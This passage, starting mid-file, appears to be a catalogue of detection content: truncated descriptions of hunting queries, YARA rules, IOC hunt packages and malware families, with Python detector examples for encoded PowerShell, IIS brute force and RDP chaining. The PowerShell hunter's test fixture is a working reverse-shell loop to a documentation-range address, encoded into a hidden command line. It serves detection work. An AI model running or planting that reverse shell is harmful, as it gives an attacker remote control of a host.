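    """What 'powershell -EncodedCommand' expects: Base64 over UTF-16LE text."""
    return base64.b64encode(script.encode("utf-16-le")).decode("ascii")


def decode_encoded_command(cmdline):
    """Return the decoded script, or None if the line carries no valid payload."""
    match = ENC_FLAG.search(cmdline)
    if not match:
        return None
    try:
        return base64.b64decode(match.group(1), validate=True).decode("utf-16-le")
    except (ValueError, UnicodeDecodeError):  # binascii.Error is a ValueError
        return None


def reverse_shell_indicators(script):
    lowered = script.lower()
    return sorted(name for name, needle in INDICATORS.items() if needle in lowered)


def hunt(cmdlines, min_hits=3):
    """(command line, indicators) for every encoded command that trips min_hits."""
    findings = []
    for cmdline in cmdlines:
        script = decode_encoded_command(cmdline)
        if script is None:
            continue
        hits = reverse_shell_indicators(script)
        if len(hits) >= min_hits:
            findings.append((cmdline, hits))
    return findings


# Constructed fixtures. The first is a trimmed reverse-shell loop in the shape
# of Invoke-PowerShellTcpOneLine, pointed at a documentation-range address.
REVERSE_SHELL = (
    "$client = New-Object System.Net.Sockets.TCPClient('192.0.2.10',4444);"
    "$stream = $client.GetStream();[byte[]]$bytes = 0..65535|%{0};"
    "while(($i = $stream.Read($bytes,0,$bytes.Length)) -ne 0){"
    "$data = (New-Object System.Text.ASCIIEncoding).GetString($bytes,0,$i);"
    "$sendback = (iex $data 2>&1 | Out-String);"
    "$sendbyte = ([text.encoding]::ASCII).GetBytes($sendback);"
    "$stream.Write($sendbyte,0,$sendbyte.Length)};$client.Close()"
)
CMDLINES = [
    "powershell.exe -NoP -W Hidden -enc " + encode_command(REVERSE_SHELL),
    "powershell.exe -EncodedCommand " + encode_command(
        "Get-Process | Sort-Object CPU -Descending | Select-Object -First 5"),
    "powershell.exe -ExecutionPolicy Bypass -File C:\\scripts\\inventory.ps1",
]

if __name__ == "__main__":
    for cmdline, hits in hunt(CMDLINES):
        print(cmdline[:48], "...", hits)
```

Matching the Base64 string itself, as a static rule has to, only works while the attacker keeps the exact byte layout; decoding first and matching the script makes the same indicators survive changes to the listener address, variable names or argument order.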
'This hunting query identifies updates to the RequiredResourceAccess property of an OAuth application. This property specifies resources that an application requires access to and the set of OAuth per
'Powercat is a PowerShell implementation of netcat. Whilst it can be used as a legitimate administrative tool it can be abused by attackers to exfiltrate data. This query looks for command line activi
'Finds PowerShell execution events that could involve a download'
The 'rat_rdp
The 'rat_telnet' YARA rule detects the presence of a Remote Administration
Remote Administration toolkit VNC
Remote Administration toolkit using webcam
'This detection uses Normalized Process Events to hunt Signed Binary Proxy Execution: Rundll32 activities'
Sniff LAN network traffic
'Beyond your internal software management systems, it is possible you may not have visibility into your entire footprint of SolarWinds installations. This is intended to help use process execution inf
Malware can spread east-west file
Malware can spread east-west using share drive
Match Windows Http API call
Match Windows Inet API call
Match Windows Inet API library declaration
Match Winsock 2 API library declaration
'Summarizes uses of uncommon and undocumented command-line switches to create persistence. User accounts may be created to achieve persistence on a machine. Read more here: https://attack.mitre.org/wiki/T
Attackers can use AdFind, an administrative tool, to gather information about domain controllers and ADFS servers. They may also rename the executable to look like other benign tools on the system. The query below
Hunt package for 113 IOCs associated with ClearFake
Hunt package for 4 IOCs associated with KongTuke
Hunt package for 43 IOCs associated with Unknown malware
Cobalt Strike is a sophisticated malware used for command and control (C2) operations, enabling attackers
The Lumma Stealer malware is a data-exfiltration tool that steals sensitive information such as credentials, browser data, and cryptocurrency wallet details. It typically arrives via phishing emails containing malicious URLs or compromised websites that deliver the payload. SOC analysts should monitor for unusual outbound traffic, unexpected process executions, and signs of credential theft or
Hunt package for 2 IOCs associated with MaskGramStealer
StrelaStealer is a credential-stealing malware that exfiltrates sensitive data such as usernames, passwords, and browser cookies by establishing command-and-control (C2) communication through malicious domains. It
Vidar malware is a data exfiltration tool that steals credentials and sensitive information via encrypted channels, often leveraging stolen credentials or phishing to maintain persistence. It typically arrives through malicious email attachments, compromised credentials, or exploit kits, using IP:port and URL IOCs to establish command-and
'Shows the rarest processes seen running for the first time. (Performs best over longer time ranges - eg 3+ days rather than 24 hours!) These new processes could be benign new programs installed on ho
Hunt package for 3 malicious URLs tagged as 118-107-44-190-8080
Hunt package for 3 malicious URLs tagged as 118-107-44-213-8080
Hunt package for 3 malicious URLs tagged as 118-107-44-253-8080
Hunt package for 15 malicious URLs tagged as 144-91-86-92
Hunt package for 6 malicious URLs tagged as 32-bit
Hunt package for 5 malicious URLs tagged as 38-76-199-154-8888
Hunt package for 2 malicious URLs tagged as ascii
Hunt package for 7 malicious URLs tagged as ClearFake
Hunt package for 29 malicious URLs tagged as malware_download
Hunt package for 11 malicious URLs tagged as mirai
Hunt package for 13 malicious URLs tagged as Mozi
Affect private profile
Create or check mutex
Affect private profile
Affect system registries
Affect system token
'This detection uses Normalized Process Events to detect System Shutdown/Reboot (MITRE Technique: T1529)'
This query identifies Copilot Studio AI agents that have Model Context Protocol (MCP) tools configured. MCP tools extend agent capabilities but introduce additional security considerations because the
This query identifies AI agents whose owners are either disabled or removed from the organization. Orphaned agents without an active owner pose governance and security risks because no one is account
This query identifies AI agents that remain unpublished and have not been modified for at least 30 days. While these agents may not pose an immediate security threat, they can create operational inef
Perform crypto currency mining
Inject certificate in store
'This detection uses Normalized Process Events to hunt Certutil activities'
This query identifies Copilot Studio AI agents that are published and contain actions configured with Author Authentication (maker's personal credentials) but have not been used or invoked in the last
This query identifies Copilot Studio AI agents that contain hard-coded credentials in Topics or Actions. Storing credentials in clear text within agent logic creates a security risk because these sec
This query identifies Copilot Studio AI agents that use HTTP actions to endpoints where Power Platform connectors are available (e.g., graph.microsoft.com, management.azure.com). Using direct HTTP ca
This query identifies Copilot Studio AI agents that send HTTP requests to endpoints using non-HTTPS schemes. Communication over unencrypted HTTP exposes sensitive data in transit and increases the ri
This query identifies Copilot Studio AI agents that send HTTP requests to endpoints using non-standard ports (other than 443). Communication over uncommon ports can indicate suspicious activity, unau
Identifies Copilot Studio AI agents with Model Context Protocol (MCP) tools configured using maker credentials. This configuration can create security risks because the tool runs with the maker's pers
This query identifies Copilot Studio AI agents without authentication mechanisms. Authentication is an agent-level configuration. Such misconfiguration poses significant security risks because when t
This query identifies Copilot Studio AI agents that are shared broadly-either with the entire organization or configured for multi-tenant access. Such configurations significantly increase the risk of
This query identifies Copilot Studio AI agents that are published and use the maker's personal credentials in their authentication or integration flows. This configuration introduces security risks b
This query identifies Copilot Studio AI agents that are published but have not been used by any user in the organization for the last 30 days. Dormant agents can create unnecessary exposure and may s
Advers
This query identifies Copilot Studio AI agents configured to send emails to external mailboxes (outside the organization's domains). Such configurations can lead to sensitive or internal data being e
This query identifies Copilot Studio AI agents with classic orchestration that include Actions not referenced in any Topic. While unused Actions may not pose an immediate security risk, they can intr
Steal Firefox credential
Steal credential
Steal VNC credential
'This hunting query looks for process command line activity related to activity observed by Dev-0056. The command lines this query hunts for are used as part of the threat actor's post exploitation ac
'This hunting query looks for hosts that have attempted to interact with the Discord CDN. This activity is not normally invoked from the command line and could indicate C2, exfiltration, or malware de
Dynamic DNS
Escalate privileges
'The Exchange PowerShell Snap-in was loaded on a host; this allows Exchange server management via PowerShell. While this is a legitimate administrative tool, it is abused by attackers to perform
Run a keylogger
Lookup Geolocation
Lookup external IP
Communication using dga
Communications use DNS
File downloader/dropper
Communications over FTP
Communications over HTTP
Communications over IRC network
Communications over SSL
Communications over RAW socket
Take screenshot
Record Audio
Hunt package for 6 IOCs associated with Kimwolf
Hunt package for 107 IOCs associated with ClearFake
Hunt package for 6 IOCs associated with Unknown malware
Hunt package for 4 IOCs associated with Unknown Stealer
Hunt package for 2 IOCs associated with Remcos
Hunt package for 66 IOCs associated with StrelaStealer
Hunt package for 6 IOCs associated with Vidar
Hunt package for 21 malicious URLs tagged as 32-bit
Hunt package for 30 malicious URLs tagged as ClearFake
Hunt package for 18 malicious URLs tagged as elf
Hunt package for 10 malicious URLs tagged as exe
Hunt package for 12 malicious URLs tagged as malware_download
The Mozi malware family is a peer-to-peer IoT botnet that enables remote command execution on infected devices and is used for persistent access and DDoS. It typically spreads by brute-forcing weak Telnet credentials and exploiting known vulnerabilities in routers and DVRs rather than via phishing. SOC analysts should monitor for unusual outbound traffic to listed domains, signs of lateral movement,
This query identifies A365 AI agents that contain hard-coded credentials in their tools or actions. Storing credentials in clear text within agent logic creates a security risk because these secrets
This query identifies A365 AI agents that send HTTP requests to endpoints using non-HTTPS schemes. Communication over unencrypted HTTP exposes sensitive data in transit and increases the risk of inte
This query identifies A365 AI agents that send HTTP requests to endpoints using non-standard ports (other than 443). Communication over uncommon ports can indicate suspicious activity, unauthorized n
This query identifies A365 AI agents that have Model Context Protocol (MCP) tools configured. MCP tools extend agent capabilities but introduce additional security considerations because they can exec
This query identifies A365 AI agents that have tools configured that are not mentioned in their instructions.
This query identifies A365 AI agents whose owners are either disabled or removed from the organization, and are not blocked. Orphaned agents without an active owner pose governance and security risks
This query identifies A365 AI agents that are shared publicly. Such configurations significantly increase the risk of unauthorized access by unintended users, which could lead to data exposure or misu
This query identifies A365 AI agents that are published but have short or insufficient instructions. Short instructions increase the risk of prompt injection attacks, where malicious input can influe
This query identifies A365 AI agents that are published but lack configured instructions. Missing instructions increase the risk of prompt injection attacks, where malicious input can influence the a
Check if hotfix are applied
This query identifies Copilot Studio AI agents using generative orchestration to send emails via the Outlook connector where all action input values are populated dynamically by the orchestrator. Th
Create a COM server
Create a new process
Create a windows service
Bypass DEP
Disable Task Manager
'This query looks for messages related to file downloads of suspicious file types on an Exchange Server. This could indicate attempted deployment of webshells. This query uses the Exchange HttpProxy
'This query looks for suspicious request patterns to Exchange servers that fit patterns recently blogged about by PeterJson. This exploitation chain utilises an SSRF vulnerability in Exchange which ev
'This alerts when the account setting is changed to allow either external domain access or anonymous access to meetings.'
'Identifies when 30 or more ports are used for a given client IP in 10 minutes occurring on the IIS server. This could be indicative of attempted port scanning or exploit attempt at internet facing we
'Identifies when 100 or more failed attempts by a given user in 10 minutes occur on the IIS Server. This could be indicative of attempted brute force based on known account information. This could als
Hijack network configuration
Code injection with CreateRemoteThread in a remote process
Communications dyndns network
Communications over P2P network
Communications smtp
Communications smtp
Communications smtp
Listen for incoming communication
Communications over TOR network
Communications over Teredo network
Communications over UDP network
Install itself for autorun at Windows startup
'This query looks for suspicious request patterns to Exchange servers that fit a pattern observed by Silk Typhoon actors. The same query can be run on HTTPProxy logs from on-premises hosted Exchange se
'This query looks for messages related to file downloads of suspicious file types. This query uses the Exchange HttpProxy AOBGeneratorLog, you will need to onboard this log as a custom log under the t
'Alerts on links that have been shared across multiple Zoom chat channels by the same user in a short space of time. Adjust the threshold figure to change the number of channels a message needs to be
Hunt package for 124 IOCs associated with ClearFake
Hunt package for 12 IOCs associated with Unknown malware
Hunt package for 25 IOCs associated with Unknown Loader
Hunt package for 9 IOCs associated with Unknown Stealer
Hunt package for 10 IOCs associated with Nanocore RAT
Hunt package for 2 IOCs associated with Remcos
Hunt package for 5 IOCs associated with ValleyRAT
Vidar is a credential-stealing malware that exfiltrates sensitive data via encrypted channels, often targeting financial institutions and using persistence mechanisms to maintain long-term access.
Hunt package for 44 malicious URLs tagged as 32-bit
Hunt package for 40 malicious URLs tagged as ClearFake
Hunt package for 9 malicious URLs tagged as malware_download
Hunt package for 2 malicious URLs tagged as mirai
Hunt package for 5 malicious URLs tagged as Mozi
'The alert shows users that join a Zoom meeting from a time zone other than the one the meeting was created in. You can also whitelist known good time zones in the tz_whitelist value using the tz data
The following rule is referenced from AlienVault's YARA rule repository. This rule contains additional process and driver names.
Affect hook table
'This alerts when end to end encryption is disabled for Zoom meetings.'
'Identifies accounts that are added to a privileged group and then quickly removed, which could be a sign of compromise.'
'Identifies whenever a user account has the setting "Password Never Expires" in the user account properties selected. This is indicated in Security event 4738 in the EventData item labeled UserAccount
'Detects successful signins using single factor authentication where the device, location, and ASN are abnormal. Single factor authentications pose an opportunity to access compromised accounts, inve
'Identifies connection attempts (success or fail) from clients with very short or very long User Agent strings and with less than 100 connection attempts.'
Checks if being debugged
Checks for the presence of known debug tools
Anti-Sandbox checks for Anubis
Anti-Sandbox checks for CWSandbox
Anti-Sandbox checks for Joe Sandbox
Anti-Sandbox checks for Sandboxie
Anti-Sandbox checks for ThreatExpert
AntiVM checks for Bios version
AntiVM checks for VirtualBox
AntiVM checks for VMWare
Detects when there is a login attempt from a country that has not seen a successful login in the previous 14 days. Threat actors may attempt to authenticate with credentials from compromised accounts
'Detects when a privileged user account successfully authenticates from a location, device or ASN that another admin has not logged in from in the last 7 days. Privileged accounts are a key target f
YARA rule: Check_FindWindowA_iat
YARA rule: Check_OutputDebugStringA_iat
YARA rule: check_RaiseException_iat
YARA rule: Check_unhandledExceptionFiler_iat
Anti-debug process memory working set size check
Disable AntiVirus
Disable Firewall
Disable Registry editor
Disable User Access Control
'Identifies when failed logon attempts are 20 or higher during a 10 minute period (2 failed logons per minute minimum) from a valid account.'
'Identifies when 20 or more failed attempts from a given client IP in 1 minute occur on the IIS server. This could be indicative of an attempted brute force. This could also simply indicate a misconfi
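The IIS threshold rules in this list (30 or more server ports per client IP in 10 minutes, 100 or more failed attempts per user in 10 minutes, 20 or more failed attempts per client IP in 1 minute) share one shape: count events per key inside a sliding time window and alert when the count crosses a threshold. The following is an added example written for this page, not any rule's own KQL; it implements that shape in Python over constructed IIS-style log lines. The field layout, the IP addresses, and the choice of 401/403 as "failed attempt" status codes are assumptions.

```python
from collections import defaultdict, deque
from datetime import datetime, timedelta

# Constructed IIS-style log lines (date time c-ip cs-username s-port sc-status).
# Not real traffic: 10.0.0.5 sweeps 35 server ports in under 6 minutes, 10.0.0.9
# produces 25 HTTP 401s in under a minute, and 10.0.0.7 fails five times over an hour.
def make_sample_lines():
    base = datetime(2024, 5, 1, 10, 0, 0)
    lines = []
    for i in range(35):
        t = base + timedelta(seconds=10 * i)
        lines.append(f"{t:%Y-%m-%d %H:%M:%S} 10.0.0.5 - {8000 + i} 404")
    for i in range(25):
        t = base + timedelta(seconds=2 * i)
        lines.append(f"{t:%Y-%m-%d %H:%M:%S} 10.0.0.9 alice 443 401")
    for i in range(5):
        t = base + timedelta(minutes=12 * i)
        lines.append(f"{t:%Y-%m-%d %H:%M:%S} 10.0.0.7 bob 443 401")
    return lines

FAILED_STATUSES = {401, 403}  # assumption: sc-status values that count as a failed attempt

def parse_line(line):
    date, clock, ip, user, port, status = line.split()
    return {
        "ts": datetime.strptime(f"{date} {clock}", "%Y-%m-%d %H:%M:%S"),
        "ip": ip, "user": user, "port": int(port), "status": int(status),
    }

def window_hits(events, key_fn, value_fn, window, threshold, distinct=False):
    """Return the keys for which at least `threshold` events (or distinct values,
    with distinct=True) fall inside some span no longer than `window`.
    `events` must be sorted by timestamp; value_fn returns None to skip an event."""
    buffers = defaultdict(deque)
    hits = set()
    for ev in events:
        value = value_fn(ev)
        if value is None:
            continue
        key = key_fn(ev)
        q = buffers[key]
        q.append((ev["ts"], value))
        while ev["ts"] - q[0][0] > window:  # drop entries that aged out of the window
            q.popleft()
        count = len({v for _, v in q}) if distinct else len(q)
        if count >= threshold:
            hits.add(key)
    return hits

def run_detections(lines):
    events = sorted((parse_line(line) for line in lines), key=lambda e: e["ts"])
    failed = lambda e: 1 if e["status"] in FAILED_STATUSES else None
    return {
        # 30+ distinct server ports from one client IP within 10 minutes
        "port_sweep": window_hits(events, lambda e: e["ip"], lambda e: e["port"],
                                  timedelta(minutes=10), 30, distinct=True),
        # 100+ failed attempts by one (non-anonymous) user within 10 minutes
        "failed_by_user": window_hits(events, lambda e: e["user"],
                                      lambda e: failed(e) if e["user"] != "-" else None,
                                      timedelta(minutes=10), 100),
        # 20+ failed attempts from one client IP within 1 minute
        "failed_by_ip": window_hits(events, lambda e: e["ip"], failed,
                                    timedelta(minutes=1), 20),
    }

if __name__ == "__main__":
    for name, keys in run_detections(make_sample_lines()).items():
        print(f"{name}: {sorted(keys) or 'none'}")
```

The deque keeps only the events still inside the window, so memory stays bounded per key and the same helper serves a "distinct ports" rule and a "failed attempts" rule; in production the thresholds would be tuned against a baseline rather than fixed as above, and scanners that spread a sweep over longer than the window will not trigger, which is the usual trade-off with windowed counts.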
'Identifies an interrupted sign-in session from a country the user has not signed in from before in the last 7 days, where the password was correct. Although the session is interrupted by other controls such
'Identifies when a user account was created and then added to the builtin Administrators group in the same day. This should be monitored closely and all additions reviewed.'
'Detects a successful logon by a privileged account from an ASN not logged in from in the last 14 days. Monitor these logons to ensure they are legitimate and identify if there are any similar sign
'Detects when there is a Service Principal login attempt from a country that has not seen a successful login in the previous 14 days. Threat actors may attempt to authenticate with credentials from
'This query identifies whether an Active Directory user object was assigned a service principal name, which could indicate that an adversary is preparing to perform Kerberoasting. This query check
'This query looks for new processes being spawned by the Exchange UM service where that process has not previously been observed before. Reference: https://www.microsoft.com/security/blog/2021/03/02/
'This query looks for errors that may indicate that an attacker is attempting to exploit a vulnerability in the service. Reference: https://www.microsoft.com/security/blog/2021/03/02/hafnium-targetin
'Identifies a match across various data feeds for named pipe IOCs related to the Solorigate incident. For the sysmon events required for this detection, logging for Named Pipe Events needs to be conf
Hunt package for 163 IOCs associated with ClearFake
Hunt package for 4 IOCs associated with KongTuke
Hunt package for 2 IOCs associated with Unknown malware
Hunt package for 2 IOCs associated with StrelaStealer
Hunt package for 28 IOCs associated with Vidar
Hunt package for 36 malicious URLs tagged as 32-bit
Hunt package for 11 malicious URLs tagged as 45-156-87-194
Hunt package for 37 malicious URLs tagged as ClearFake
Hunt package for 2 malicious URLs tagged as elf
Hunt package for 3 malicious URLs tagged as malware_download
The Mirai malware family is a botnet that compromises IoT devices to launch large-scale DDoS
Hunt package for 8 malicious URLs tagged as Mozi
'Identifies when a user account has been added to a privileged built in domain local group or global group such as the Enterprise Admins, Cert Publishers or DnsAdmins. Be sure to verify this is an exp
'Identifies when a user account is created and then deleted within 10 minutes. This can be an indication of compromise and an adversary attempting to hide in the noise.'
'Identifies when a user account is enabled and then disabled within 10 minutes. This can be an indication of compromise and an adversary attempting to hide in the noise.'
'This query uses the Azure Defender Security Nested Recommendations data to find machines vulnerable to OMIGOD CVE-2021-38647. OMI is the Linux equivalent of Windows WMI and helps users manage configu
'This detection uses Security events from the "AD FS Auditing" provider to detect suspicious object identifiers (OIDs) as part of EventID 501, specifically within the Enhanced Key Usage attributes. T
'This query detects modification in the AdminSDHolder in the Active Directory which could indicate an attempt for persistence. AdminSDHolder Modification is a persistence technique in which an attac
YARA rule: Check_Debugger
YARA rule: Check_Dlls
YARA rule: Check_DriveSize
The 'Check_FilePaths
YARA rule: Check_Qemu_Description
YARA rule: Check_Qemu_DeviceMap
YARA rule: Check_UserNames
YARA rule: Check_VBox_Description
The 'Check_VBox_DeviceMap' rule detects potential malicious activity involving VirtualBox device mapping, such as unauthorized device redirection or suspicious
YARA rule: Check_VBox_Guest_Additions
YARA rule: Check_VBox_VideoDrivers
The 'Check_VmTools' YARA rule detects artifacts associated with virtual machine tools, which may indicate evasion techniques or malicious activity in virtualized environments
YARA rule: Check_VMWare_DeviceMap
YARA rule: Check_Wine
'This query uses Sysmon Image Load (Event ID 7) and Process Create (Event ID 1) data to look for COM Event System being used to load a newly seen DLL.'
YARA rule: DebuggerPattern__CPUID
YARA rule: DebuggerPattern__SEH_Inits
YARA rule: DebuggerPattern__SEH_Saves
'This query detects an abuse of the DSRM account in order to maintain persistence and access to the organization's Active Directory. Ref: https://adsecurity.org/?p=1785'
'This query detects domain user accounts creation (event ID 4720) where the username ends with $. Accounts that end with $ are normally domain computer accounts and when they are created the event ID
'Identifies when a recently created Group was added to a privileged built in domain local group or global group such as the Enterprise Admins, Cert Publishers or DnsAdmins. Be sure to verify this is
'This query looks for any mass download by a single user with possible file copy activity to a new USB drive. Malicious insiders may perform such activities that may cause harm to the organization. T
'This detection uses Windows security events to detect suspicious access attempts to the registry key of Microsoft Entra ID Health monitoring agent. This detection requires an access control entry (AC
'This detection uses Windows security events to detect suspicious access attempts to the registry key values and sub-keys of Microsoft Entra ID Health service agents (e.g AD FS). Information from AD H
'This query identifies when a process execution command-line indicates that a registry value is written to allow for later execution of a malicious script. References: https://www.microsoft.com/security/
'This query identifies when rundll32.exe executes a specific set of inline VBScript commands. References: https://www.microsoft.com/security/blog/2021/03/04/goldmax-goldfinder-sibot-analyzing-nobelium-
'Adversaries may establish persistence and/or elevate privileges by executing malicious content triggered by accessibility features. Windows contains accessibility features that may be launched with a
'Identifies when an RDP connection is made to multiple systems and above the normal connection count for the previous 7 days. Connections from the same system with the same account within the same day
'This query identifies Active Directory computer objects modifications that allow an adversary to abuse the Resource-based constrained delegation. This query checks for event id 5136 that the Object
'The query looks for source code files being modified immediately after a build process is started. The purpose of this is to look for malicious code injection during the build process. More details:
'A service principal name (SPN) is used to uniquely identify a service instance in a Windows environment. Each SPN is usually associated with a service account. Organizations may have used service acc
'Identifies when an RDP connection is new or rare related to any logon type by a given account today compared with the previous 14 days. RDP connections are indicated by the EventID 4624 with LogonTyp
'Query detects potential lateral movement within a network by identifying when an RDP connection (EventID 4624, LogonType 10) is made to an initial system, followed by a subsequent RDP connection from
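The RDP chaining rule above looks for an RDP logon (EventID 4624, LogonType 10) to one host followed by an RDP logon from that host to another. The following is an added example written for this page, not the rule's own KQL: it runs that logic in Python over constructed 4624 records. The hostname-to-IP table, the one-hour window, and the requirement that both hops use the same account are assumptions made here (in a SIEM the mapping would come from device inventory or DHCP data, and the same-account constraint can be relaxed with the flag).

```python
from datetime import datetime, timedelta

# Assumed hostname-to-IP mapping; in a SIEM this would be joined from DeviceInfo/DHCP data.
HOST_IP = {"WS01": "10.1.0.11", "SRV-FILE": "10.1.0.20", "DC01": "10.1.0.5", "WS07": "10.1.0.17"}

# Constructed EventID 4624 / LogonType 10 records (not real telemetry).
SAMPLE_EVENTS = [
    {"ts": "2024-05-01 09:00:00", "account": "jdoe",   "src_ip": "10.1.0.11", "dst_host": "SRV-FILE"},
    {"ts": "2024-05-01 09:12:00", "account": "jdoe",   "src_ip": "10.1.0.20", "dst_host": "DC01"},
    {"ts": "2024-05-01 09:30:00", "account": "svc-bk", "src_ip": "10.1.0.20", "dst_host": "WS07"},
    {"ts": "2024-05-01 11:00:00", "account": "admin2", "src_ip": "10.1.0.17", "dst_host": "SRV-FILE"},
    {"ts": "2024-05-02 15:00:00", "account": "admin2", "src_ip": "10.1.0.20", "dst_host": "DC01"},
]

def find_rdp_chains(events, window=timedelta(hours=1), same_account=True):
    """Return (account, origin_ip, first_hop, second_hop) tuples where an RDP logon
    to first_hop is followed within `window` by an RDP logon *from* first_hop's IP
    to a different host. same_account=True (an assumption) additionally requires the
    same account on both hops, which is the common lateral-movement pattern."""
    parsed = sorted(
        ({**e, "ts": datetime.strptime(e["ts"], "%Y-%m-%d %H:%M:%S")} for e in events),
        key=lambda e: e["ts"],
    )
    chains = []
    for i, first in enumerate(parsed):
        hop_ip = HOST_IP.get(first["dst_host"])
        if hop_ip is None:  # unknown host: cannot tell whether later logons came from it
            continue
        for second in parsed[i + 1:]:
            if second["ts"] - first["ts"] > window:
                break  # events are sorted, so nothing later can be inside the window
            if (second["src_ip"] == hop_ip
                    and second["dst_host"] != first["dst_host"]
                    and (not same_account or second["account"] == first["account"])):
                chains.append((first["account"], first["src_ip"],
                               first["dst_host"], second["dst_host"]))
    return chains

if __name__ == "__main__":
    for account, origin, hop1, hop2 in find_rdp_chains(SAMPLE_EVENTS):
        print(f"{account}: {origin} -> {hop1} -> {hop2}")
```

With the sample data the jdoe hops (WS01 to SRV-FILE, then SRV-FILE to DC01 twelve minutes later) form the only same-account chain; the admin2 pair is 28 hours apart and falls outside the window. Dropping the same-account constraint also surfaces the svc-bk logon from SRV-FILE, which is how a chain that switches to a harvested credential on the first hop would appear.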
YARA rule: SEH_Init
YARA rule: SEH_Save
'Surfaces any Defender Alert for Solorigate Events. In Microsoft Sentinel the SecurityAlerts table includes only the Device Name of the affected device, this query joins the DeviceInfo table to clearl
Hunt package for 3 IOCs associated with Mirai
Hunt package for 63 IOCs associated with ClearFake
Hunt package for 7 IOCs associated with AMOS
Hunt package for 7 IOCs associated with Unknown malware
The "Unknown Loader" malware is a downloader that
The "Unknown Stealer" malware is a data-exfiltration
Hunt package for 2 IOCs associated with AsyncRAT
Hunt package for 2 IOCs associated with Nanocore RAT
Hunt package for 15 IOCs associated with NetSupportManager RAT
Hunt package for 87 IOCs associated with Vidar
Hunt package for 26 malicious URLs tagged as 32-bit
Hunt package for 26 malicious URLs tagged as ClearFake
Hunt package for 30 malicious URLs tagged as elf
Hunt package for 7 malicious URLs tagged as Mozi
Hunt package for 2 malicious URLs tagged as sh
Hunt package for 7 malicious URLs tagged as ua-wget
Possibly employs anti-virtualization techniques
'This query will alert on any sign-ins from devices infected with malware in correlation with workspace deletion activity. Attackers may attempt to delete workspaces containing compute instances afte
Detects suspicious registry modifications made by suspicious processes, such as script engines like WScript or CScript. These processes are rarely used for legitimate registry modifica
Detects file creation events indicating NetExec (nxc.exe) execution on the local machine. NetExec is a PyInstaller-bundled binary that extracts its embedded data files to a "_MEI<random>" directory un
Detects the addition of an SSP to the registry. Upon a reboot or API call, SSP DLLs gain access to encrypted and plaintext passwords stored in Windows.
Detects execution of the hacktool NetExec. NetExec (formerly CrackMapExec) is a widely used post-exploitation tool designed for Active Directory penetration testing and network enumeration. In enterpri
'This rule identifies a web request to a URL that holds a file type, including .ps1, .bat, .vbs, and .scr that can be harmful if downloaded. This analytic rule uses [ASIM](https://aka.ms/AboutASIM) an
'This rule identifies a web request with a user agent header known to belong to a crypto miner. This indicates a crypto miner may have infected the client machine. You can add custom crypto mining
'This rule identifies a web request with a user agent header known to belong to a hacking tool. This indicates a hacking tool is used on the host. You can add custom hacking tool indicating User-Ag
'This rule identifies a web request with a user agent header known to belong to PowerShell. You can add custom PowerShell indicating User-Agent headers using a watchlist, for more information refer t
'This query looks for an account being created from a domain that is not regularly seen in a tenant. Attackers may attempt to add accounts from these sources as a means of establishing persistent ac
'Detects when a Temporary Access Pass (TAP) is created for a Privileged Account. A Temporary Access Pass is a time-limited passcode issued by an admin that satisfies strong authentication requiremen
'Identifies an export of the ADFS DKM Master Key from Active Directory. References: https://blogs.microsoft.com/on-the-issues/2020/12/13/customers-protect-nation-state-cyberattacks/, https://cloud.go
'Detects anomalous IP address usage by user accounts and then checks to see if a suspicious Teams action is performed. Query calculates IP usage Delta for each user account and selects accounts where
'Identifies sign-in anomalies from an IP in the last hour, targeting multiple users where the password is correct after multiple attempts'
'Identifies a match for SQL Injection attack in the Application gateway WAF logs. The Threshold value in the query can be changed as per your infrastructure's requirement. References: https://owasp.o
'Identifies a match for XSS attack in the Application gateway WAF logs. The Threshold value in the query can be changed as per your infrastructure's requirement. References: https://owasp.org/www-pro
'Detects changes to an Application ID URI. Monitor these changes to make sure that they were authorized. Ref: https://docs.microsoft.com/azure/active-directory/fundamentals/security-operations-app
'Detects the redirect URL of an app being changed. Applications associated with URLs not controlled by the organization can pose a security risk. Ref: https://docs.microsoft.com/azure/active-direc
'Identifies if an AV scan fails in Azure App Services.'
'Identifies if an AV scan finds infected files in Azure App Services.'
This detects attempts to manipulate audit policies using the auditpol command. This technique was seen in relation to the Solorigate attack, but the results can indicate potential malicious activity used in di
'This query looks for Microsoft Defender AV detections related to Dev-0530 actors. In Microsoft Sentinel the SecurityAlerts table includes only the Device Name of the affected device, this query join
'This query looks for Microsoft Defender AV detections related to Europium actor. In Microsoft Sentinel the SecurityAlerts table includes only the Device Name of the affected device, this query join
'This query looks for Microsoft Defender AV detections related to Hive Ransomware. In Microsoft Sentinel the SecurityAlerts table includes only the Device Name of the affected device, this query joins
'This query looks for diagnostic settings that are removed from a resource. This could indicate an attacker or malicious insider trying to evade detection before a malicious act is performed. If the di
'Identifies when the Azure Run Command operation is executed by a UserPrincipalName and IP Address that has resulted in a recent user entity behaviour alert.'
'Identifies when Azure Run command is used to execute a PowerShell script on a VM that is unique. The uniqueness of the PowerShell script is determined by taking a combined hash of the cmdLets it impo
'Detects changes to an application's sign-out URL. Look for any modifications to a sign-out URL. Blank entries or entries pointing to non-existent locations would stop a user from terminating a session. Ref
'Detects changes to the ownership of an application. Monitor these changes to make sure that they were authorized. Ref: https://learn.microsoft.com/en-gb/entra/architecture/security-operations-ap
'PIM provides a key mechanism for assigning privileges to accounts, this query detects changes to PIM role settings. Monitor these changes to ensure they are being made legitimately and don't confer
'Correlate IPs blocked by a Cisco firewall appliance with successful Microsoft Entra ID signins. Because the IP was blocked by the firewall, that same IP logging on successfully to Entra ID is potenti
'IP addresses of broadband links that usually indicates users attempting to access their home network, for example for a remote session to a home computer.'
'Detects first connection to an unpopular website (possible malicious payload delivery).'
'Detects suspicious user agent strings used by crypto miners in proxy logs.'
'Rule helps to detect empty and unusual user agent indicating web browsing activity by an unusual process other than a web browser.'
'Detects suspicious user agent strings used by known hack tools'
'Rule helps to detect a rare user-agents indicating web browsing activity by an unusual process other than a web browser.'
'It is recommended that these categories be blocked by policy because they provide harmful/malicious content.'
'Detects request to potentially harmful file types (.ps1, .bat, .vbs, etc.).'
'Malware can use IP address to communicate with C2.'
'Rule helps to detect PowerShell user-agent activity by an unusual process other than a web browser.'
'This query looks for changes to COM registry keys to point to files in C:\Windows\System32\spool\drivers\color\. This can be used to enable COM hijacking for persistence. Ref: https://www.microso
'Detects a Conditional Access Policy being modified by a user who has not modified a policy in the last 14 days. A threat actor may try to modify policies to weaken the security controls in place.
'CreepyDrive uses OneDrive for command and control; however, it makes regular requests to predictable paths. This detection will alert when over 20 sequences are observed in a single day.'
'CreepyDrive uses OneDrive for command and control. This detection identifies URLs specific to CreepyDrive.'
